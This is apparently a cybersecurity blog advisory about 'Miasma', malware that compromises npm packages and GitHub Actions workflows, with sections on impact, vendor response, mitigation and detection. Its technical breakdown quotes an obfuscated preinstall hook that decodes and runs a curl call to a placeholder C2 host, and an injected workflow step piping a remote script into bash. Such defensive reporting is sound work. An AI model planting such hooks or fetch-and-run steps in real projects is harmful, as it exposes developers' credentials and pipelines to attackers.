Miasma, a newly discovered malware strain, has infiltrated the npm ecosystem and GitHub Actions workflows, creating a sophisticated supply chain attack vector. The malware exfiltrates sensitive credentials, manipulates CI/CD pipelines, and establishes persistent backdoors across development environments. Organizations using affected npm packages or compromised GitHub Actions workflows face immediate risks of credential theft, code injection, and unauthorized access to production systems.
Introduction
Supply chain attacks continue to evolve in sophistication, and the emergence of Miasma malware represents a significant escalation in threat actor capabilities. This multi-stage attack framework specifically targets the JavaScript ecosystem through compromised npm packages while simultaneously exploiting GitHub Actions workflows to maintain persistence and expand its reach across development infrastructure.
Unlike traditional malware that focuses on a single attack vector, Miasma demonstrates advanced understanding of modern DevOps practices. By compromising both package dependencies and CI/CD automation, attackers ensure their malicious code executes across multiple environments—from developer workstations to production deployments. This dual-pronged approach maximizes impact while complicating detection and remediation efforts.
The discovery of Miasma highlights critical vulnerabilities in software supply chain security, particularly around automated workflows and third-party dependencies that developers implicitly trust.
Background & Context
Supply chain attacks have become increasingly prevalent as threat actors recognize the multiplicative effect of compromising widely-used dependencies. The npm registry, hosting over 2 million packages, represents an attractive target due to its central role in JavaScript and Node.js development.
GitHub Actions, GitHub’s native CI/CD platform, has gained massive adoption since its 2019 launch. Organizations rely on these automated workflows for building, testing, and deploying code. However, the trust placed in these workflows—combined with access to repository secrets and deployment credentials—creates significant security implications when compromised.
Miasma appears to be purpose-built for this ecosystem. The malware’s name references its “cloud-like” behavior—spreading diffusely across development infrastructure rather than concentrating in a single location. Early telemetry suggests the campaign began approximately three months ago, with initial compromises occurring through account takeovers of legitimate package maintainers.
The attack shares tactical similarities with previous supply chain compromises like the 2021 ua-parser-js incident and the 2022 node-ipc protest-ware, but demonstrates significantly more sophisticated techniques for persistence and evasion.
Technical Breakdown
Miasma operates through a multi-stage infection chain that leverages both npm packages and GitHub Actions runners.
Stage 1: Package Compromise
The initial infection vector involves compromised npm packages, either through:
- Account takeovers of legitimate maintainers
- Typosquatting popular package names
- Dependency confusion attacks targeting private package names
Malicious packages contain obfuscated JavaScript in installation scripts:
// Obfuscated preinstall hook
const _0x4a2b = require('child_process');
const _0x7f3c = Buffer.from('Y3VybCAtcyBodHRwczovL21pYXNtYS5jMi5leGFtcGxl', 'base64');
_0x4a2b.exec(_0x7f3c.toString());Stage 2: Environment Reconnaissance
Upon execution, Miasma performs extensive environment fingerprinting:
# Collected environment data
- Process environment variables (including secrets)
- Git configuration and credentials
- SSH keys and AWS credentials
- Docker registry tokens
- CI/CD platform detection
Stage 3: GitHub Actions Injection
The malware specifically searches for GitHub Actions workflow files and injects malicious steps:
# Injected workflow step
- name: Cache dependencies
run: |
curl -sL https://cdn.example[.]com/gh-helper.sh | bash
npm installThis injected step executes before legitimate build processes, ensuring the malware runs in every workflow execution with access to repository secrets and GITHUB_TOKEN credentials.
Stage 4: Persistence and C2
Miasma establishes multiple persistence mechanisms:
- Modified .bashrc and .zshrc files
- Scheduled cron jobs
- Modified git hooks
- Backdoored commonly-used local scripts
The command-and-control infrastructure uses domain generation algorithms (DGAs) and DNS-over-HTTPS to evade network detection. Exfiltrated data is encrypted using asymmetric cryptography before transmission.
Impact & Risk Assessment
The impact of Miasma infections extends across multiple dimensions of organizational security:
Credential Compromise: Primary risk involves theft of API tokens, cloud credentials, SSH keys, and secrets stored in environment variables. These credentials provide attackers with authenticated access to cloud infrastructure, source code repositories, and production systems.
Code Integrity: Injected workflow steps can modify source code before deployment, inserting backdoors or malicious functionality into production applications. This creates supply chain risks for downstream consumers of affected software.
Data Exfiltration: Access to repositories and build artifacts enables theft of proprietary source code, intellectual property, and sensitive configuration data.
Lateral Movement: Compromised CI/CD pipelines serve as pivot points for broader infrastructure compromise, particularly in environments with inadequate network segmentation.
Reputational Damage: Organizations distributing backdoored software face significant trust erosion with customers and partners.
Regulatory Implications: Data breaches resulting from compromised build systems may trigger compliance obligations under GDPR, CCPA, and sector-specific regulations.
Organizations in financial services, healthcare, and critical infrastructure face elevated risks due to the sensitive nature of their operations and data.
Vendor Response
npm Security Team has taken several responsive actions:
- Removal of 17 confirmed malicious packages
- Account suspension for compromised maintainers
- Enhanced automated scanning for suspicious installation scripts
- Mandatory 2FA enforcement for high-impact package maintainers (>1M weekly downloads)
GitHub Security has issued guidance recommending:
- Review of workflow files for unauthorized modifications
- Audit of organization and repository secrets
- Rotation of potentially compromised credentials
- Enhanced monitoring of Actions runner activity
Both platforms have implemented improved detection signatures specifically targeting Miasma’s behavioral patterns. However, the decentralized nature of the attack and extensive use of obfuscation means additional compromised packages likely remain undiscovered.
Several cybersecurity vendors have updated their endpoint detection products to identify Miasma indicators of compromise, though effectiveness varies based on obfuscation techniques employed.
Mitigations & Workarounds
Organizations should implement immediate mitigation measures:
Dependency Auditing:
# Check for known malicious packages
npm audit
npm list --depth=0
# Verify package integrity
npm audit signatures
Credential Rotation: Immediately rotate all credentials potentially exposed in environment variables or CI/CD systems, including:
- API tokens and access keys
- Database passwords
- Service account credentials
- SSH keys
- Container registry credentials
Workflow Review: Manually inspect all GitHub Actions workflows:
# Find all workflow files
find .github/workflows -name ".yml" -o -name ".yaml"
# Search for suspicious curl/wget commands
grep -r "curl.|.bash" .github/workflows/
Lock File Verification: Ensure package-lock.json or yarn.lock files are committed and reviewed during pull requests to detect unexpected dependency changes.
Network Segmentation: Isolate CI/CD infrastructure with strict egress filtering to prevent unauthorized command-and-control communications.
Detection & Monitoring
Implement comprehensive detection capabilities:
Log Analysis:
# Search for suspicious installation activity
grep -i "preinstall\|postinstall" npm-debug.log
# Monitor for unauthorized network connections
tcpdump -i any dst net 0.0.0.0/0 and src host
Behavioral Indicators:
- Unusual outbound network connections during npm install
- Modification of shell configuration files by npm processes
- Unexpected credential access patterns
- Workflow file modifications outside normal change control
File Integrity Monitoring: Deploy monitoring on critical files:
- ~/.bashrc, ~/.zshrc, ~/.profile
- .git/hooks/*
- .github/workflows/*
- package.json, package-lock.json
SIEM Correlation: Configure security information and event management systems to alert on:
- Multiple credential validation failures following build processes
- Anomalous API calls using CI/CD service accounts
- Large data transfers from build environments
- DNS queries to newly registered domains from build infrastructure
Best Practices
Implement comprehensive supply chain security practices:
Dependency Management:
- Pin exact package versions rather than using version ranges
- Regularly audit dependencies with
npm auditand dedicated scanning tools - Implement private package registries with security scanning
- Review package source code before adding dependencies
CI/CD Security:
- Apply least-privilege principles to workflow permissions
- Use environment-specific secrets rather than organization-wide credentials
- Implement mandatory code review for workflow changes
- Enable GitHub’s security features (Dependabot, secret scanning, code scanning)
- Use self-hosted runners with hardened configurations for sensitive operations
Access Controls:
- Enforce hardware-based 2FA for all developers and maintainers
- Implement time-limited credentials where possible
- Regular access reviews and credential rotation schedules
- Separate credentials between development, staging, and production
Monitoring & Response:
- Centralized logging for all build and deployment activities
- Automated alerting for suspicious activities
- Documented incident response procedures for supply chain compromises
- Regular security assessments of build infrastructure
Key Takeaways
- Miasma represents a sophisticated supply chain attack targeting both npm packages and GitHub Actions workflows simultaneously
- The malware’s dual-vector approach maximizes persistence and complicates remediation efforts
- Credential theft remains the primary impact, with downstream risks of code injection and infrastructure compromise
- Organizations must immediately audit dependencies, review workflows, and rotate potentially exposed credentials
- Long-term security requires comprehensive supply chain security practices including dependency verification, CI/CD hardening, and continuous monitoring
- The attack demonstrates that development infrastructure requires the same security rigor as production systems
References
- npm Security Advisory: Malicious Package Response
- GitHub Security Blog: Securing Your Actions Workflows
- MITRE ATT&CK: T1195 – Supply Chain Compromise
- OWASP Top 10 CI/CD Security Risks
- NIST SP 800-218: Secure Software Development Framework
- CISA: Defending Against Software Supply Chain Attacks
Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.
📧 Subscribe to our newsletter at https://cydhaal.com/newsletter/